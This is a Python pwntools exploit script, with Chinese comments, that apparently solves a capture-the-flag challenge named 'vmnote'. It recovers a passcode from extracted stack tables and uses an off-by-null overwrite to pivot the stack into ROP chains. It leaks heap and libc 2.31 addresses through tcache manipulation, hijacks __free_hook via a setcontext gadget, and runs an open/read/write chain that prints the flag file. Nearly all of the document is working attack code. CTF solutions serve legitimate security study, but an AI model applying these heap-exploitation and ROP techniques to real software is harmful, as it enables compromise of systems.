from signal import pause
from time import sleep
from pwn import*
from random import randint, random
p=process("./vmnote")
context(log_level="debug",arch="amd64")
libc=ELF("./libc-2.31.so")
# try solve passcode
# 先 break 到第一次 ret 的位置,此时栈上从0x1000 开始的信息在 extracted_stack 文件中
# passcode 1. 长度大于 0x11 reg1 是 given_rand
stack1=[218, 179, 148, 171, 119, 96, 184, 110, 192, 93, 154, 165, 95, 46, 76, 181, 98, 239, 185, 231, 168, 72, 195, 60, 22, 67, 31, 8, 219, 230, 217, 201, 56, 92, 2, 61, 125, 251, 3, 246, 176, 190, 134, 216, 19, 48, 89, 229, 208, 147, 145, 9, 194, 81, 4, 177, 65, 213, 113, 236, 32, 7, 250, 207, 85, 204, 146, 133, 127, 200, 49, 94, 223, 33, 163, 245, 55, 71, 186, 120, 254, 174, 62, 43, 37, 25, 151, 64, 252, 78, 132, 167, 225, 241, 140, 88, 143, 144, 161, 211, 215, 122, 45, 13, 100, 14, 53, 105, 189, 221, 224, 166, 235, 155, 234, 87, 206, 35, 30, 121, 40, 170, 75, 6, 103, 227, 18, 77, 175]
# 0x58b1230458d793d0   0x5123d0ead0d5931e 0x58 提取 stack2
stack2=[0xd0,0x93,0xd7,0x58,0x04,0x23,0xb1,0x58,0x1e,0x93,0xd5,0xd0,0xea,0xd0,0x23,0x51,0x58]
def passcode_encode(passcode,reg1):
    qword1=passcode[17:25]
    qword1=u64(qword1)
    qword1-=0x12345678
    assert(qword1==reg1)
    # 0x739 调用的时候 %0 是 buffer_offset %1 是0x101f %2 是 0x11
    for i in range(0x11):
        passcode[i]=stack1[passcode[i]]
    for i in range(0x11):
        assert(passcode[i]==stack[0x1120+i])

def create(idx,siz,content):
    p.recvuntil("choice>> ")
    p.sendline("1")
    p.recvuntil("idx: ")
    p.sendline(str(idx))
    p.recvuntil("size: ")
    p.sendline(str(siz))
    p.recvuntil("content: ")
    p.send(content)
def show(idx):
    p.recvuntil("choice>> ")
    p.sendline("2")
    p.recvuntil("idx: ")
    p.sendline(str(idx))
def delete(idx):
    p.recvuntil("choice>> ")
    p.sendline("4")
    p.recvuntil("idx: ")
    p.sendline(str(idx))
# decode passcode
s=b""
for i in range(17):
    c=stack2[i]
    for j in range(256):
        if stack1[j]==c:
            s+=p8(j)
            break
l=p.recvline()
rand_num=int(l.split()[-1])
print(rand_num)
num2=rand_num+0x12345678
print(hex(num2))
s+=str(num2).encode("latin-1") # 这里不能发 p64 啊啊啊 因为代码里面调用的是 atoi 函数
p.recvuntil("passcode: ")
p.sendline(s)
cnt=0
s=""

# 外层实现的 read_in 有一个 off-by-null 覆盖 rbp 的低字节为 0x00 从而劫持 sp 为 0x1f00 之类的数，这个 show 和 remove 里面都可用
# 打 ROP，利用 show_entry,先在 read_idx 中把 0x1f00 之类的地址赋值为我们想要跳转到的函数地址，然后去溢出覆盖 rbp 进而栈迁移
# 我们内层需要触发: 先正常的 create 一个正常堆块 如 0x40 之类的大小 然后传一个比如说是 0x100000040 的 nbytes  赋值 regs2
# libc leak: 内层需要一个申请 0x1d0 的堆块 就 pop_%1 %0 那个 gadget 再调 0x77

create(0,0x60,"A")
create(1,0x60,"B")
create(2,0x60,"C")
delete(2)
delete(0)
create(0,0x60,"d")
show(0)                # heap leak
pop_1_2_ret=0x764
ret=0x628
# 本轮 ROP: buf 利用 gadget 回 0x764 直接溢出
p.recvuntil("content: ")
heap_base=u64(p.recv(6).ljust(8,b"\x00"))-0x764
print(hex(heap_base))
# rop
#gdb.attach(p)
#pause()
create(2,0x60,"e")
delete(1)
delete(2)

p.recvuntil("choice>> ")
p.sendline("2")
p.recvuntil("idx: ")
ropchain=p64(ret)*6+p64(pop_1_2_ret)+p64(heap_base+0x690)+p64(0x100000000+0x50)+p64(0xaa)+p64(0x145) # 先简单升一下栈，方便后续打
payload=b"6hhhhhhh"+ropchain
p.send(payload)
sleep(0.4)
payload2=b"a"*0x60+p64(0)+p64(0x21)+p64(heap_base+0x690)+p64(0x20000000060)+p64(0)+p64(0x71)+p64(3)*12+p64(0)+p64(0x21)+p64(0)*2+p64(0)+p64(0x71)+p64(heap_base+0x2f0)
p.send(payload2)
# 手动发 create(3,0x60,"g"*8)
cnt=0
p.recvuntil("choice>> ")

p.sendline("1")
recv=p.recv(timeout=0.01)
if b"choice" in recv:
    p.sendline("1")
    p.recvuntil("idx: ")
    p.sendline("3")
elif b"idx" in recv:
    p.sendline("3")

p.recvuntil("size: ")
p.sendline("96")
p.recvuntil("content: ")
p.send("g")

create(2,0x60,"g"*24)
show(2)
#  0x7fe12af73000 0x7fe12b15f5c0
p.recvuntil("content: gggggggggggggggggggggggg")
libc_leak=u64(p.recv(6).ljust(8,b"\x00"))
libc_base=libc_leak-0x1ec5c0
print(hex(libc_base))
free_hook=libc_base+libc.sym["__free_hook"]
delete(3)
create(1,0x50,"h")
create(3,0x50,"i")
delete(1)
delete(3)
p.recvuntil("choice>> ")
p.sendline("2")
p.recvuntil("idx: ")
ropchain=p64(pop_1_2_ret)+p64(heap_base+0x690)+p64(0x100000000+0x50)+p64(0xaa)+p64(0x145)
payload=b"6hhhhhhh"+p64(0)+p64(ret)*5+ropchain # 看栈够不够 发现不够，那就升吧
# set {int}$rebase(0x70b8)=0x1e30 set {int}$rebase(0x70c0)=0x1ec8
#gdb.attach(p)
#pause()
p.send(payload)
pop_rdi=0x26b72+libc_base
pop_rsi=0x27529+libc_base
pop_rdx_r12=0x11c371+libc_base
flag_addr=heap_base+0x990+0x100
pop_rax=0x4a550+libc_base
syscall=libc_base+libc.symbols["read"]+0x10
rop=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(2)+p64(syscall)
rop+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx_r12)+p64(0x30)+p64(0)+p64(libc_base+libc.symbols["read"])
rop+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx_r12)+p64(0x30)+p64(0)+p64(libc_base+libc.symbols["write"])
#my_payload=flat({0x8:p64(heap_base+0x690),0x20:p64(libc_base+libc.symbols["setcontext"]+61),0x78:p64(heap_base+0x100),0xa0:p64(heap_base+0x100),0xa8:p64(ret),0x100:ropchain,0x300:b"flag\x00"})
payload3=b"a"*0x8+p64(heap_base+0x690)+p64(3)*2+p64(libc_base+libc.symbols["setcontext"]+61)+p64(0)*7+p64(0)+p64(0x21)+p64(heap_base+0x690)+p64(heap_base+0x990)+p64(0)+p64(0x71)+p64(3)*2+p64(heap_base+0x990)+p64(libc_base+0x581ee)+p64(0)*8+p64(0)+p64(0x21)+p64(heap_base+0x690)+p64(0x60)+p64(0)+p64(0x71)+p64(0)*12
# 这一步覆盖的时候注意维护原有链表结构和维护 free 的 tcache 的 fd 指针
payload3+=p64(0)+p64(0x21)+p64(0)*2+p64(0)+p64(0x61)+p64(0)*10+p64(0)+p64(0x61)+p64(free_hook)+p64(0)*9+p64(0)+p64(0x21)+p64(heap_base+0x820)+p64(0)+p64(0)+p64(0x206f1)
payload3=payload3.ljust(0x300,b"\x00")+rop
payload3=payload3.ljust(0x400,b"\x00")+b"flag\x00"
magic=libc_base+0x154930   # mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
sleep(0.4)
p.send(payload3)
#create(1,0x50,"j")

p.recvuntil("choice>> ")

p.sendline("1")
recv=p.recv(timeout=0.01)
if b"choice" in recv:
    p.sendline("1")
    p.recvuntil("idx: ")
    p.sendline("1")
elif b"idx" in recv:
    p.sendline("1")

p.recvuntil("size: ")
p.sendline("80")
p.recvuntil("content: ")
p.send("g")
# gdb.attach(p)
# pause()
create(3,0x50,p64(magic)*2)

delete(0)

# delete 1 会调用 free hook 此时进行栈迁移
# payload=flat({
#     0x8:p64(heap_addr),
#     0x20:p64(libc_base+libc.symbols["setcontext"]+61),
#     0x78:p64(heap_addr+0x100),
#     0xa0:p64(heap_addr+0x100),
#     0xa8:p64(ret),
#     0x100:rop,
#     0x300:b"flag\x00"
# })
p.interactive()
# set {long long}$rebase(0x8f08)=0x145
# set {long long}$rebase(0x8f00)=0xaa
# set {long long}$rebase(0x8ef8)=0x100000050
# set {long long}$rebase(0x8ef)=heap_base+0x690
# set {long loong}$rebase(0x8ee8)=0x764
# b *$rebase(0x23a2)
# b* $rebase(0x279e)
# b* $rebase(0x21f5)
